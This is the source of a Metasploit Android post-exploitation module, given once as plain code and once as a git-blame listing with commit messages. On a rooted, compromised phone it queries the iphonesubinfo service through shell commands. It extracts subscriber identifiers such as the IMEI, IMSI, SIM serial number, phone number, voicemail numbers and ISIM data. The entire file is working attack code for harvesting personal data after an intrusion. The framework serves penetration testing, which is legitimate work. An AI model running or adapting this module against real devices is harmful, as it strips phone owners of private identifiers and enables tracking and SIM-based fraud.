modules/post/android/gather/sub_info.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  include Msf::Post::Common
  include Msf::Post::Android::Priv
  include Msf::Post::Android::System

  def initialize(info={})
    super( update_info( info, {
        'Name'          => "extracts subscriber info from target device",
        'Description'   => %q{
            This module displays the subscriber info stored on the target phone.
            It uses call service to get values of each transaction code like imei etc.
        },
        'License'       => MSF_LICENSE,
        'Author'        => ['Auxilus'],
        'SessionTypes'  => [ 'meterpreter', 'shell' ],
        'Platform'       => 'android',
      }
    ))
  end

  def run
    unless is_root?
      print_error("This module requires root permissions.")
      return
    end

    @transaction_codes ||= [
      'DeviceId',
      'DeviceIdForSubscriber',
      'ImeiForSubscriber',
      'DeviceSvn',
      'SubscriberId',
      'SubscriberIdForSubscriber',
      'GroupIdLevel1',
      'GroupIdLevel1ForSubscriber',
      'IccSerialNumber',
      'IccSerialNumberForSubscriber',
      'Line1Number',
      'Line1NumberForSubscriber',
      'Line1AlphaTag',
      'Line1AlphaTagForSubscriber',
      'Msisdn',
      'MsisdnForSubscriber',
      'VoiceMailNumber',
      'VoiceMailNumberForSubscriber',
      'CompleteVoiceMailNumber',
      'CompleteVoiceMailNumberForSubscriber',
      'VoiceMailAlphaTag',
      'VoiceMailAlphaTagForSubscriber',
      'IsimImpi',
      'IsimDomain',
      'IsimImpu',
      'IsimIst',
      'IsimPcscf',
      'IsimChallengeResponse',
      'IccSimChallengeResponse'
    ]
    values ||= []
    arr ||= []
    for code in 1..@transaction_codes.length do
      print_status("using code : #{code}")
      cmd = "service call iphonesubinfo #{code}"
      block = cmd_exec(cmd)
      value,tc = get_val(block, code)
      arr << [tc, value]
    end

    tc_tbl = Rex::Text::Table.new(
      'Header'  => 'Subscriber info',
      'Indent'  => 1,
      'Columns' => ['transaction code', 'value']
    )

    arr.each do |a|
      tc_tbl << [
        a[0],     #  TRANSACTION CODE
        a[1]      #  value
      ]
    end
    print_line(tc_tbl.to_s)
  end

  def get_val(data, code)
    parsed = data.gsub(/Parcel/, '')
    string = ''
    100.times do |i|
      next if i % 2 == 0
      str = parsed.split("'")[i]
      break if str.nil?
      string += str
    end
    v = ''
    string.split(".").each do |chr|
      next if chr.nil? or chr == "\n"
      v += chr
    end
    return v,@transaction_codes[code-1]
  end
end
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`class MetasploitModule < Msf::Post`

			`include Msf::Post::Common`
			`include Msf::Post::Android::Priv`
			`include Msf::Post::Android::System`

			`def initialize(info={})`
			`super( update_info( info, {`
			`'Name' => "extracts subscriber info from target device",`
			`'Description' => %q{`
Update sub_info.rb 2018-05-02 21:48:01 +05:30			`This module displays the subscriber info stored on the target phone.`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`It uses call service to get values of each transaction code like imei etc.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => ['Auxilus'],`
			`'SessionTypes' => [ 'meterpreter', 'shell' ],`
			`'Platform' => 'android',`
			`}`
			`))`
			`end`

			`def run`
check for root 2018-05-15 17:32:10 +05:30			`unless is_root?`
			`print_error("This module requires root permissions.")`
fix error handling 2018-07-26 16:48:34 -05:00			`return`
check for root 2018-05-15 17:32:10 +05:30			`end`

Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`@transaction_codes \|\|= [`
			`'DeviceId',`
			`'DeviceIdForSubscriber',`
			`'ImeiForSubscriber',`
			`'DeviceSvn',`
			`'SubscriberId',`
			`'SubscriberIdForSubscriber',`
			`'GroupIdLevel1',`
			`'GroupIdLevel1ForSubscriber',`
			`'IccSerialNumber',`
			`'IccSerialNumberForSubscriber',`
			`'Line1Number',`
			`'Line1NumberForSubscriber',`
			`'Line1AlphaTag',`
			`'Line1AlphaTagForSubscriber',`
			`'Msisdn',`
			`'MsisdnForSubscriber',`
			`'VoiceMailNumber',`
			`'VoiceMailNumberForSubscriber',`
			`'CompleteVoiceMailNumber',`
			`'CompleteVoiceMailNumberForSubscriber',`
			`'VoiceMailAlphaTag',`
			`'VoiceMailAlphaTagForSubscriber',`
			`'IsimImpi',`
			`'IsimDomain',`
			`'IsimImpu',`
			`'IsimIst',`
			`'IsimPcscf',`
			`'IsimChallengeResponse',`
			`'IccSimChallengeResponse'`
fix error handling 2018-07-26 16:48:34 -05:00			`]`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`values \|\|= []`
			`arr \|\|= []`
Update sub_info.rb 2018-05-02 22:02:09 +05:30			`for code in 1..@transaction_codes.length do`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`print_status("using code : #{code}")`
Update sub_info.rb 2018-05-03 02:51:39 +05:30			`cmd = "service call iphonesubinfo #{code}"`
Update sub_info.rb 2018-05-15 16:55:52 +05:30			`block = cmd_exec(cmd)`
Update sub_info.rb 2018-05-02 20:44:21 +05:30			`value,tc = get_val(block, code)`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`arr << [tc, value]`
			`end`

			`tc_tbl = Rex::Text::Table.new(`
Update sub_info.rb 2018-05-02 21:48:01 +05:30			`'Header' => 'Subscriber info',`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`'Indent' => 1,`
			`'Columns' => ['transaction code', 'value']`
			`)`

			`arr.each do \|a\|`
			`tc_tbl << [`
			`a[0], # TRANSACTION CODE`
			`a[1] # value`
			`]`
			`end`
			`print_line(tc_tbl.to_s)`
			`end`

Update sub_info.rb 2018-05-02 20:44:21 +05:30			`def get_val(data, code)`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`parsed = data.gsub(/Parcel/, '')`
			`string = ''`
			`100.times do \|i\|`
			`next if i % 2 == 0`
			`str = parsed.split("'")[i]`
Minor fixes 2018-05-02 20:51:30 +05:30			`break if str.nil?`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`string += str`
			`end`
Minor fixes 2018-05-02 20:51:30 +05:30			`v = ''`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`string.split(".").each do \|chr\|`
			`next if chr.nil? or chr == "\n"`
Minor fixes 2018-05-02 20:51:30 +05:30			`v += chr`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`end`
Minor fixes 2018-05-02 20:51:30 +05:30			`return v,@transaction_codes[code-1]`
Add android post module to extract subscriber info 2018-05-02 20:41:54 +05:30			`end`
			`end`